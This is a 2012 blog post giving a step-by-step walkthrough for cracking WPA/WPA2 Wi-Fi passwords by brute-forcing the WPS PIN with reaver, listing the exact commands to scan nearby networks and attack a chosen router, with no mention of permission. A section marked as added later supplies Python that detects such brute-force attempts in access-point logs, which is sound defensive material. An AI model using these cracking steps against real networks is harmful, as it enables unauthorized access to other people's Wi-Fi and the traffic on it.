Wednesday, 22 February 2012

How to crack WPA/WPA2 without a dictionary in 4-10 hours with reaver


The reign of secure WPA/WPA2 network encryption is now over. It no longer takes decades to crack thanks to Tactical Network Solutions. Their brilliant team have found a weakness in WPA that lets an attacker brute-force the Wi-Fi Protected Setup (WPS) PIN in order to then recover the WPA/WPA2 key. We'll be using a tool which exploits this bug called reaver.

I will take you through how this is done on a Linux machine, specifically Ubuntu!
Using the terminal:

1. Install aircrack-ng:
sudo apt-get install aircrack-ng
2. Put Wifi adapter into monitor mode:
sudo airmon-ng start wlan0
3. Use airodump-ng to scan for WPA/WPA2 encrypted network BSSIDs:
sudo airodump-ng mon0
4. Press <ctrl+c> after a few seconds or once a list of BSSIDs has populated; it should look like this:


The BSSIDs are listed on the left; these are the IDs for the various surrounding networks. Pick one which is WPA/WPA2 and uses a Pre-Shared Key (PSK).

Don't close this terminal. Open up a new terminal and use that from now on.

READ STEPS 5-8 OR JUST COPY AND PASTE THIS INTO YOUR TERMINAL AND THEN SKIP TO STEP 9:
sudo apt-get install libsqlite3-dev && wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz && tar xfvz reaver-1.4.tar.gz && cd reaver-1.4/src/ && ./configure && make && sudo make install
5. Download and install libsqlite3-dev:
sudo apt-get install libsqlite3-dev
6. Download reaver:
wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz
7. Extract reaver tar.gz file:
tar xfvz reaver-1.4.tar.gz
8. Install reaver:
cd reaver-1.4/src/ && ./configure && make && sudo make install
9. Get cracking! Copy the BSSID you chose from the other open terminal and enter it like this:
sudo reaver -i mon0 -b <paste BSSID here!!> -vv
-i mon0 = use the mon0 interface, which is your wifi adapter in monitor mode.
-b <BSSID> = the router to crack.
-vv = give very verbose output.

10. Now wait around 4-10 hours while it cracks the network key!
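As an added, defender-side example (not part of the original post): the reason step 10 takes hours is that reaver sends thousands of failed WPS PIN exchanges from a single client MAC, which is exactly what an access point's logs should be alerting on. The log format below is assumed (hostapd-style WPS-FAIL events) and the sample lines are constructed; the sliding-window counter flags any station whose WPS failures exceed a threshold within a few minutes.

```python
"""Flag WPS PIN brute-force attempts from access-point logs.

Assumed log line format (hostapd-like, constructed for this example):
    <unix_ts> <iface>: STA <client mac> WPS-FAIL msg=<n> config_error=<n>
"""
import re
from collections import defaultdict, deque

LINE_RE = re.compile(
    r"^(?P<ts>\d+)\s+\S+:\s+STA\s+"
    r"(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})\s+WPS-FAIL\b"
)

# Constructed sample: one legitimate client mistypes its PIN twice, far apart;
# one station fails every few seconds, as a PIN brute force does.
SAMPLE_LOG = [
    "1005 wlan0: STA aa:bb:cc:dd:ee:01 WPS-FAIL msg=8 config_error=18",
    "1900 wlan0: STA aa:bb:cc:dd:ee:01 WPS-FAIL msg=8 config_error=18",
] + [
    f"{1000 + 3 * i} wlan0: STA 00:11:22:33:44:55 WPS-FAIL msg=8 config_error=18"
    for i in range(12)
]


def wps_bruteforce_alerts(lines, threshold=10, window=300):
    """Return {mac: timestamp} for each station that reached `threshold`
    WPS failures inside any `window`-second sliding window. The timestamp
    is the moment the threshold was first crossed."""
    recent = defaultdict(deque)  # per-MAC timestamps still inside the window
    alerts = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a WPS failure event
        ts, mac = int(m["ts"]), m["mac"].lower()
        q = recent[mac]
        q.append(ts)
        while q and ts - q[0] > window:  # drop failures older than the window
            q.popleft()
        if len(q) >= threshold and mac not in alerts:
            alerts[mac] = ts
    return alerts


if __name__ == "__main__":
    for mac, ts in wps_bruteforce_alerts(SAMPLE_LOG).items():
        print(f"WPS brute force suspected from {mac} at t={ts}")
```

A hit is a strong signal to disable WPS on the access point, or at least to enable its PIN lockout, since the PIN is the only thing protecting the WPA/WPA2 key in this attack.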

So I hope people have found this useful. It was just meant as a walkthrough as opposed to a detailed look at how it all works.